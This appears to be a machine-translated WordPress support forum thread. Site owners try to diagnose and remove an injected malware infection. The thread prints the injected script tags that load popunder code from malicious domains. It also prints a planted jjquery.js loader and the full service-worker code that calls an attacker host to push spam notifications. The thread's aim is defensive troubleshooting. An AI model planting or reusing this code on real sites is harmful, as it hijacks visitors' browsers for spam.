Pregunta sobre Arreglando WordPress de Wordpress:

código de inyección de malware por encima de DOCTYPE

Un usuario preguntó 👇

Un sitio web de solución de problemas se burla la primera vez que se carga (después de la primera carga, debe esperar 24 horas antes de que se vuelva a inyectar el siguiente código)


<script>
var popunder = {expire: 12,url: "https://winyoursuperprize1.life/?u=mr1kd0x&o=f5pp7z3&t=mixxxx1"};
</script>
<script src="https://winyoursuperprize1.life/js/popunder.js"></script>
<script type="text/javascript" src="https://betamedia.biz/?pu=he4dcm3cmi5ha3ddf4zdaobv" async></script><!DOCTYPE html>

Como puede ver, se inyecta antes de la etiqueta doctype. Probé GREP y busqué en la base de datos, pero no puedo encontrar la causa raíz de este error. Definitivamente está ofuscado o algo así.

Después de revisar los archivos de WordPress después de acceder a mí a través de ssh, encontré este archivo llamado jjquery.js en la raíz de wordpress, que obviamente me llamó la atención.

Este código existía


self.importScripts(' H T T P S  // mediadate     net/sw/w_11.js');

Eliminé el enlace de arriba para que no tengas que hacer clic accidentalmente en él. No creo que sea malicioso, sin embargo, no es necesario que haga clic en él, incluí el código a continuación.

este es el script importado:


'use strict';
self.addEventListener('install', function (event) {
  event.waitUntil(self.skipWaiting());
});
self.addEventListener('activate', function(event) {
	event.waitUntil(clients.claim());
});
self.addEventListener('push', function(event) {
  event.waitUntil(
    self.registration.pushManager.getSubscription()
      .then(function(subscription) {
        return fetch('https://mediadate.net/?endpoint=' + subscription.endpoint.split('/').pop() + '&ver=2')
          .then(function(response) {
            return response.json()
            .then(function(data) {
              return setTimeout(function(){
                return self.registration.showNotification(data.title, data.body);
              }, 300);
            });
          });
      })
  );
});
self.addEventListener('notificationclick', function(event) {
    const target = event.notification.data.url;
    event.notification.close();
    event.waitUntil(clients.matchAll({
        type: 'window',
        includeUncontrolled: true
    }).then(function(clientList) {
        for (var i = 0; i < clientList.length; i++) {
            var client = clientList[i];
            if (client.url == target && 'focus' in client) {
                return client.focus();
            }
        }
        return clients.openWindow(target);
      })
  );
});

Entonces, mi pregunta es, ¿alguien más ha experimentado esto y cómo lo eliminó?

(@sterndata)

Moderador del foro y voluntario del equipo de apoyo

Hace 1 año, 3 meses

Tome una taza de café recién hecho, respire hondo y siga esta guía con atención. Una vez que haya terminado, es posible que desee implementar algunas (si no todas) de las medidas de seguridad recomendadas.

Si no puede limpiar su sitio / sitios con éxito, existen organizaciones acreditadas que pueden limpiar sus sitios por usted. Sucuri y Wordfence son gemelos.

(@ g0tr00t)

Hace 1 año, 3 meses

@sondreal Parece ser una inyección de Javascript que intenta enlistar a ciertos usuarios para que se suscriban a las notificaciones automáticas del navegador para que puedan recibir spam sin descanso. Valoramos proporcionar los dominios santificados; no estaban en la lista negra antes y esto ayuda a agregarlos más rápidamente para advertir a otros 🙂

Me gustaría probar su nombre de dominio codificado en decimal sin el TLD tanto en el archivo como en la base de datos:


119 105 110 121 111 117 114 115 117 112 101 114 112 114 105 122 101 49

Puede intentar buscar solo «http»:


104 116 116 112

Hasta la fecha, no he podido obtener las fuentes de JavaScript externas iniciales para que se muestren en varias aplicaciones en el sitio web utilizando varios agentes de usuario y / o redirecciones URL, por lo que no estoy seguro de que pueda obtenerlo ya.

(@traudlina)

Hace 1 año, 3 meses

Tengo el mismo problema con 2 sitios.

Eliminé el .js, edité el .htaccess, busqué en la base de datos: 104116116112, «evaluado», «base64», «curl», «gzinflate», «rot13», haga el wp-admin y el wp incluye una actualización de carpeta

y compruebe el plugin «GOTMLS», que indica que los rasgos potenciales son:… / html / wp-admin / include / class-pclzip.php?… / html / wp-content / cache / minify / a99c7.js? html / wp-content / cache / minify / df792.js?… / html / wp-content / cache / page_enhanced / www.Mypage.com / wp-content / cache / minify / a99c7.js / _index_ssl.html_old?… / html / wp-content / cache / page_enhanced / www.Mypage.com / wp-content / cache / minify / df792.js / _index_ssl.html_old?… / html / wp-content / plugins / ninja-forms / assets / js / lib / jBox.min.js?… / html / wp-content / plugins / ninja-forms / assets / js / min / front-end-helptext.min.js?… / html / wp-content / plugins / ninja- formularios / assets / js / min / front-end-bundle.js?… / html / wp-content / plugins / ninja-forms / assets / js / min / front-end.js?… / html / wp-content / plugins / formularios ninja / assets / js / min / front-end.js.map?… / html / wp-content / plugins / ninja-forms / deprecated / js / dev / ninja-forms-display.js?… / html / wp-content / plugins / ninja-forms / deprecated / js / min / ninja-forms-display.min.js?… / html / wp-content / plugins / ninja- formularios / deprecated / upgrade / jBox.min.js? … / Html / wp -content / plugins / w3-total-cache / PgCache_ContentGrabber.php?… / Html / wp-content / plugins / w3-total-cache / lib / Nusoap / class.soapclient.php?… / Html / wp-content / plugins /w3-total-cache/lib/Nusoap/nusoap.php?… / html / wp-content / plugins / w3-total-cache / pub / js / metadata.js?… / html / wp- content / plugins / wp -google-maps / docs / js / scripts / docstrap.lib.js?… / html / wp-content / plugins / wp-google-maps / js / wpgmaps-admin-core.js?… / html / wp-content /plugins/wp-google-maps/js/wpgmaps.js?… / html / wp-include / js / json2.js?… / html / wp-include / js / json2.min.js? … / Html / wp-cover / js / tw-sack.js?… / Html / wp-includes / js / tw-sack.min.js?… / Html / wp-include / js / jquery / jquery.form. min.js?… /html/wp-includes/js/jquery/jquery.schedule.js?… / html / wp-include / js / tinymce / tiny_mce_popup.js

pero yo no trabajo .. 🙁 piensas en alguien?

(@oliviervrac)

Hace 1 año, 3 meses

Hola

El mismo problema aqui. (ventana emergente de suscripción de notificación emergente, /jjquery.js con ‘self.importScripts’https://mediadate.net/sw/w_11.js ‘;); ”…) La fecha del archivo jjquery.js es el 6 de agosto de 2019… que no parece estar relacionado con ninguna acción en el sitio web.

Encontré algunos .bt y otros .default en wp-admin / network y wp-admin / css. No se ha encontrado nada especial en la base de datos. Todavía estoy tratando de entender cómo se llevó a cabo el ataque. WordPress está actualizado (5.x)

Encontré un código extraño en las funciones .php del tema activo, comenzando con: if (! $ NpDcheckClassBgp) {$ ea = ‘_shaesx_’; …} Con algunas funciones curl y fopen… Fecha de modificación del archivo: 27 de marzo de 2019… ¡eso es viejo!

Encontré un tema que nunca instalé: «dulcet»

GOTMLS recibe «amenazas potenciales» pero no amenazas reales. Quttera Web Malut Scanner recibe amenazas conocidas (pero hay muchos falsos positivos como algunas extensiones pagas [ie XYZ WP Social Media Auto Publish]), pero funciona mejor, encontrando el .bt .default y otros archivos modificados

¡Puedo eliminar esos archivos, pero quiero entender antes cómo llegó la infección!

¿Algunas ideas?

¿Solucionó tu problema??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *